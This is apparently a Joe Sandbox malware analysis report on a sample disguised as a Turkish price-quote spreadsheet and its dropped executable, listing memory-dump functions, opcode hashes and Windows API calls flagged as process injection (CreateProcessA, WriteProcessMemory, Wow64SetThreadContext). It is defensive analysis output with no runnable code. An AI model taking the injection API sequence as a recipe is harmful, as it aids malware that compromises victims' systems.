Opcode ID: df5783b8c1a47cb615862c7222aa5693362a057fefb17277a2a39659efd5ec8d
Instruction ID: 2cb1f24270d19a5b334e7ad0e7960e6ecbf423b56fa507db7b236906d0168be9
Opcode Fuzzy Hash: df5783b8c1a47cb615862c7222aa5693362a057fefb17277a2a39659efd5ec8d
Instruction Fuzzy Hash: AC115E35B002089FCB149F68D954B9EFBBABF8C711F144069E915E7294DA719C14CB90

Function 01336FC3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361f591489836d1447d9a57f2977ec71013bb3fc18dce00b670ec41dfd97c2a3
Instruction ID: 611d640ea1e5a9ef3abe0e7e609c8dcaa8ce5a468da18d8d841d7e84b21bf57c
Opcode Fuzzy Hash: 361f591489836d1447d9a57f2977ec71013bb3fc18dce00b670ec41dfd97c2a3
Instruction Fuzzy Hash: 681179B5900208DFCB20CF58C948BABFBF6EF88318F44856AE5599B621D375D948CF54

Function 00EBD463 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3798335658.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ebd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: ff245c457751fd3f92f8152658e385df26306495cba946f1ee41a6a5d8f75e75
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 4611D376504240DFCB16CF10D9C4B56BF72FB94328F24C5A9D8490B656C336D85ACBA2

Function 0133F313 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb7689c2e837ea30e52efb3e027bc39fa4a76df81186e1789c887aa291d745a7
Instruction ID: 49f278695c198de47ddfbbd4f86727e92289da4ea24af02fa93e8202321c6733
Opcode Fuzzy Hash: cb7689c2e837ea30e52efb3e027bc39fa4a76df81186e1789c887aa291d745a7
Instruction Fuzzy Hash: CF215E74D0024ACFEB54EFB9D951B9EBFF2FF45300F1486AAD054AB265E7305A068B81

Function 0133F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914efa41e95c69df8ad79628e08ccf6465fc615797e48eb7819a525073599751
Instruction ID: 2cca985559a5cde0953332ade20ca3fe474cbe51b8797ce893bb760321294752
Opcode Fuzzy Hash: 914efa41e95c69df8ad79628e08ccf6465fc615797e48eb7819a525073599751
Instruction Fuzzy Hash: E6114F74D00209DFEB44EFB9D551B9EBFF6FB44304F1086A9D014AB265EB705A458F81

Function 00ECD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3798569775.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ecd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 51e6347782a816e2e5a85abede4f9ead69c23460b7b04c96a2fcd416e1335c70
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 9F11AC75508244DFCB15CF14DAC4B16BB62FB44318F28C6ADE8494B692C33BD84ACB52

Function 0133ABD0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ede1cb0a9921ffb98da85d5b82558549df50ca8d5faa47aef8aed3f17fed039
Instruction ID: cdf1aa3d1df98ae94cfbb8259287b2dda6e2e33281faf0bb973cb21c160406c0
Opcode Fuzzy Hash: 6ede1cb0a9921ffb98da85d5b82558549df50ca8d5faa47aef8aed3f17fed039
Instruction Fuzzy Hash: 1E01A4317042504FDB265A2DD854A297BEEEFC9A59719417AE546CB3B6EA24CC02C348

Function 01335EA3 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119bc0b7347cd31478dfd662be1101624497ed64692abb8aa475e1f87c4d428e
Instruction ID: 2d6c9bae57583fac2d2f59f93f56b06a29e95a77b934d0f9db6966863f79be90
Opcode Fuzzy Hash: 119bc0b7347cd31478dfd662be1101624497ed64692abb8aa475e1f87c4d428e
Instruction Fuzzy Hash: 4501DB327001156FDB259E699810AEF7FEBEFC8750F148026F515D7288CE718D1587A4

Function 0133E8F3 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6587123999f0b8ae890ef4ced696a458315b59e290e022dc9cb0762bb06707c9
Instruction ID: cd3a610bc69c2bd31523fe5147cb7a6cb2b4a959191b3d20cacab813b403e2a4
Opcode Fuzzy Hash: 6587123999f0b8ae890ef4ced696a458315b59e290e022dc9cb0762bb06707c9
Instruction Fuzzy Hash: 23010879D0020A9FDF40DFA9E844AAEBBB1FB49310F10466AE910A3354D7355A56CF81

Function 01339C2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d624871ba061daaaf88ea5f4a60d8e4136dee4932259e26dab04031489fc6c1
Instruction ID: bfcc7d2907880446afe2240b7a22eff3a40ffa5a315f375445563615121b7598
Opcode Fuzzy Hash: 1d624871ba061daaaf88ea5f4a60d8e4136dee4932259e26dab04031489fc6c1
Instruction Fuzzy Hash: A2F08C32A00218DFDF11CF69D848BEEBBF9EBC8369F00C026E908C3214D3714A158B90

Function 013328A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167486725ec59683f909f9b15cc4d155dd72d821a0f8f292bcfa0f4fbb061a44
Instruction ID: c115f34dbcdc6acf005884a18cf46a69df997fa9965eeb8a1eed76f1ccc58ac0
Opcode Fuzzy Hash: 167486725ec59683f909f9b15cc4d155dd72d821a0f8f292bcfa0f4fbb061a44
Instruction Fuzzy Hash: C5E0DF31D243668BC711EBB49C140EEBB34AE92321B18466BC42136591FB345658C7A2

Function 013328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f20c213b7aa071458628aaaf998ec6c6d8ca3763c46497d05dc523b4d837cc
Instruction ID: e42ebbf128c8c19ff58ee571dddb1bd7c3888a3189795c5033a8ec6cf5a01fc2
Opcode Fuzzy Hash: 58f20c213b7aa071458628aaaf998ec6c6d8ca3763c46497d05dc523b4d837cc
Instruction Fuzzy Hash: 87D01231D2032A578B10A7A9DC144DFBB38EE95721B504626D91437544EB70665986A1

Function 01338EF3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4114b4598658910b842537372e31101a8a048b75bbf0aee6e6298ed1bcc0face
Instruction ID: 079f7f05e16a32968f029ae3d17247ecdff4ff1d31e85d53a01793905d371b28
Opcode Fuzzy Hash: 4114b4598658910b842537372e31101a8a048b75bbf0aee6e6298ed1bcc0face
Instruction Fuzzy Hash: 4AD0127310D0641AE635515D3D449A75B8ED7C537971503A7FA5CE7601D8028C854169

Function 0133D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513b75dcfb6b3639d1fa2c61a642428418cdb1b7100e96645d9536f9f0bb91a6
Instruction ID: 6fe0d302875b8a76598a469ab5daa7db4c573a97e5688e780e86f62c846ddc66
Opcode Fuzzy Hash: 513b75dcfb6b3639d1fa2c61a642428418cdb1b7100e96645d9536f9f0bb91a6
Instruction Fuzzy Hash: 0DD0E234E0420CCBCF30DFB8E4844DCBB75EB88325F10552AE925A3210C63014118F41

Function 0133AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: facb2d2d11236406ef818c69306493be0c21e30c3b4d0ab27306c4274751cf9b
Instruction ID: ddcdbd9046eb9a191031aa2053f37b5f5e6193ce36faf60af8e6b3f082b05284
Opcode Fuzzy Hash: facb2d2d11236406ef818c69306493be0c21e30c3b4d0ab27306c4274751cf9b
Instruction Fuzzy Hash: A4D0677BB401089FCB149F98E8409DDF7B6FB98221B548117E915A3264C6319925DB90

Function 01336743 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9203705c253628b677eec4d4358a1e92c2f92b39663dde4447abba53bf594430
Instruction ID: 3158aa94af8fad5b5ab36d306d20c8bac1ae480aa0d7e455462b003a692990df
Opcode Fuzzy Hash: 9203705c253628b677eec4d4358a1e92c2f92b39663dde4447abba53bf594430
Instruction Fuzzy Hash: 62D0A93450032147EA25A779A941096332BABC4200B049A20B0040E60EEF30544A87A2

Function 01336748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e7b838dd9841d50279e7cb5d7bed45bc13ec4ca0800d3b6e00a8ddfcc126ea
Instruction ID: 5c71c0663414debdb3ab2f8f42d7dabd5cd65e0611849fc6bdbedc84758b91ca
Opcode Fuzzy Hash: 30e7b838dd9841d50279e7cb5d7bed45bc13ec4ca0800d3b6e00a8ddfcc126ea
Instruction Fuzzy Hash: 89C012345003144BEA55F77AFC45596735ED7C0600B409A30B0050E14EBF74294A47A1

Non-executed Functions

Function 0133F631 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302322be9e8da13687dd49746bfe620fd8e47853d7f4e6b9f50e0ca00841bde2
Instruction ID: 462745150e86848943c86f4a0089056d11a3df0531b5ca6735b6cb5398831ddc
Opcode Fuzzy Hash: 302322be9e8da13687dd49746bfe620fd8e47853d7f4e6b9f50e0ca00841bde2
Instruction Fuzzy Hash: 5AC1C374E00218CFEB54DFA9C994B9DBBB6BF89304F5081A9E409AB355DB345E81CF10

Function 0133FA88 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d35c25783b1fc8118f015809df1d048d776e725a434b3153725f0684f75b8ec6
Instruction ID: 6eb08c4963dddfdb66cca1cd33a2ca8af38697ac97fcc8d6da84640fe4691fc1
Opcode Fuzzy Hash: d35c25783b1fc8118f015809df1d048d776e725a434b3153725f0684f75b8ec6
Instruction Fuzzy Hash: A7C1B374E00218CFEB54DFA5C994B9DBBB2BF89304F5081A9E409AB355DB359E85CF10

Function 01336920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 01336952
\;q, xrefs: 0133692C
\;q, xrefs: 0133695E
\;q, xrefs: 01336936

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 24287093f364f11caa3a7395259e00d6c44bb8bd2ee4c9d72e415a3e26199270
Instruction ID: 8c475896f044572118c65db7cf9d0c5cfc9346cbbe3ecf7f31a5769fc2993a27
Opcode Fuzzy Hash: 24287093f364f11caa3a7395259e00d6c44bb8bd2ee4c9d72e415a3e26199270
Instruction Fuzzy Hash: 0901F271700108AFC720DE2DC942AA537EABFC8A68729416AE506CB371DA31ED418748

Analysis Process: YzkHZRBcm.exePID: 8040, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	329
Total number of Limit Nodes:	14

Executed Functions

Function 0102AD48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0102AF9E

Strings

$O, xrefs: 0102AED6
$O, xrefs: 0102AEFB

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: HandleModule
String ID: $O$$O
API String ID: 4139908857-2259736977
Opcode ID: 9cb15b7c2f9e8ba6a925fe0dcaef520b9f2067a2669c535e28cca395a19ce55d
Instruction ID: 41a90c9d098e8f69c736351157abfb0305b0983e5004df4da80e53c30d5e9382
Opcode Fuzzy Hash: 9cb15b7c2f9e8ba6a925fe0dcaef520b9f2067a2669c535e28cca395a19ce55d
Instruction Fuzzy Hash: 07713870A00B15CFEB64DF29D44579ABBF1BF88304F00892DE486D7A50DB79E94ACB94

Function 071B5C24 Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071B5E66

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3b43e02b18b579407ada1847a841a9540324a7470c9f935d4d0f2be2eb0be9a2
Instruction ID: 78ba6b1d43ad8a58ac05dca5fc0385237a421ada35fca5e4165c47a3591c253b
Opcode Fuzzy Hash: 3b43e02b18b579407ada1847a841a9540324a7470c9f935d4d0f2be2eb0be9a2
Instruction Fuzzy Hash: BAA15CB1D0031ACFEB25CF68C844BDDBBB2BF48310F14816AE819A7280DB749995CF91

Function 071B5C30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071B5E66

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 81cb416988ed2ad6e30ef266541cd7fcf1ca32681ea0b0dcc08d4932584e4381
Instruction ID: 68de87d2cc773fa2bc1871c178e2e0ec9ec5911f68c46d22295f30715aa543b0
Opcode Fuzzy Hash: 81cb416988ed2ad6e30ef266541cd7fcf1ca32681ea0b0dcc08d4932584e4381
Instruction Fuzzy Hash: 1A914BB1D0031ACFEB25DF68C844BEDBBB2BF48314F148169E859A7280DB749995CF91

Function 051E18E5 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051E1A02

Memory Dump Source

Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3aa4929d3c46042ab6d0ef8cd750f3173f7b43bb44984b18049fbb90526a4f5b
Instruction ID: 4ae91039f630c5dbd58e80aeb9118014747eed8c882085451c4933453384ac9f
Opcode Fuzzy Hash: 3aa4929d3c46042ab6d0ef8cd750f3173f7b43bb44984b18049fbb90526a4f5b
Instruction Fuzzy Hash: 5551C0B1D10349EFDB14CF99C984ADEBBB5FF88310F24822AE819AB210D7759945CF90

Function 051E18F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051E1A02

Memory Dump Source

Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2e91dc3e73db45f0f83961e57b625b311cc90eccdae385e1b72ddad2d43ffd20
Instruction ID: b54e8a27d5e6f70a2e3ab462aeffee3cb8cb811b4d45a25a719f22496727a450
Opcode Fuzzy Hash: 2e91dc3e73db45f0f83961e57b625b311cc90eccdae385e1b72ddad2d43ffd20
Instruction Fuzzy Hash: 3F41BEB1D10349EFDB14CF9AC884ADEBBB5FF88350F64812AE819AB210D7759945CF90

Function 010244B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010259C9

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 027cd4a1a82547e3d5df7ccd44f4dd21a9d28396240d10b3160f37c20efeaca2
Instruction ID: c0dab6ab62df193367c13e46702b2bd52e74db855a623f0453a9ae68f4943da6
Opcode Fuzzy Hash: 027cd4a1a82547e3d5df7ccd44f4dd21a9d28396240d10b3160f37c20efeaca2
Instruction Fuzzy Hash: FA41EF71C00729CBEB24CFA9C885BDDBBF5BF49304F20805AD449AB251DBB56945CF94

Function 0102590C Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010259C9

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f7fceb51c0fa340886a7bdce3d0626e94f86f0c790736795dd512c32396d3b4b
Instruction ID: 5279df1d5f29da4222037a94ef418ba5f1bc5e291178ebe21772bbf280241040
Opcode Fuzzy Hash: f7fceb51c0fa340886a7bdce3d0626e94f86f0c790736795dd512c32396d3b4b
Instruction Fuzzy Hash: 4041BEB1C00729CFEB24CFA9C885BDDBBB5BF49304F20805AD449AB251DBB5694ACF54

Function 051E4040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 051E4101

Memory Dump Source

Source File: 0000000A.00000002.1423133394.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_51e0000_YzkHZRBcm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e98348cde682f90cae7c05360b2357219d485882531d3669429144b0a705a324
Instruction ID: 847e12b330e94c2f449f53acbdeab176e5840424f5a5f208f60ea568bf0c985c
Opcode Fuzzy Hash: e98348cde682f90cae7c05360b2357219d485882531d3669429144b0a705a324
Instruction Fuzzy Hash: A84108B5900709DFDB14CF99C888AAAFBF5FB88314F24C459E519AB321D775A841CFA0

Function 071B59A0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071B5A38

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2bc84ebfab7fce57c7e98391e60bcf065dcbb25adca4498cb623fce61cb77143
Instruction ID: fb77f5816784a9beee0ac0a1191ef511bd55619342af113038ee36281442fe42
Opcode Fuzzy Hash: 2bc84ebfab7fce57c7e98391e60bcf065dcbb25adca4498cb623fce61cb77143
Instruction Fuzzy Hash: 822168B1D003499FDB14CFA9C880BDEBBF5FF48310F10842AE918A7241C7789511CBA4

Function 071B59A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071B5A38

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ffb7c650ea25baa9543d7016b15088c58e750ec66206cd133d4a43224a03410c
Instruction ID: 3a86cda5272e46edd41e24a9ad9b19eb1dbdb28e547e9dd68be4f03e9ced9794
Opcode Fuzzy Hash: ffb7c650ea25baa9543d7016b15088c58e750ec66206cd133d4a43224a03410c
Instruction Fuzzy Hash: 5A2124B1D003599FDB10CFAAC980BEEBBF5FF48310F10842AE919A7240C7789951CBA5

Function 071B53D0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071B5456

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3272cfcd3d4df4cd31165bddebb035cd875ebcc071f34e872d87abe21af387c8
Instruction ID: cb9c3261ebcc5eddfa4fb57e6a7dbb862f010e3531884137f87ab07b09bdd977
Opcode Fuzzy Hash: 3272cfcd3d4df4cd31165bddebb035cd875ebcc071f34e872d87abe21af387c8
Instruction Fuzzy Hash: BF2159B1D003099FDB10CFAAC4807EEBBF5EF48210F64842ED959A7241DB789545CBA5

Function 071B5A90 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071B5B18

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ec01099462d8882a01728ba33c872e4d85d3ac736b6a6f79adcbb94c88d52e08
Instruction ID: 1a1afcba88d51b12b52068377d90c5a290480a9342cc3ca3bb457a440e6de5a4
Opcode Fuzzy Hash: ec01099462d8882a01728ba33c872e4d85d3ac736b6a6f79adcbb94c88d52e08
Instruction Fuzzy Hash: 282139B1C003499FDB14DF9AC940BEEBBF5FF48310F10842AE919A7240C7399500CBA5

Function 0102D21C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D5F6,?,?,?,?,?), ref: 0102D6B7

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dcca5bd4ade89ca4f24403a4f0579e1d26b7cf9c41bc87b3007a928c38d9eeca
Instruction ID: 53c1fee3a029320a582f2d025c03ac01be5ff25210b09e16aef4d1614c1fde2a
Opcode Fuzzy Hash: dcca5bd4ade89ca4f24403a4f0579e1d26b7cf9c41bc87b3007a928c38d9eeca
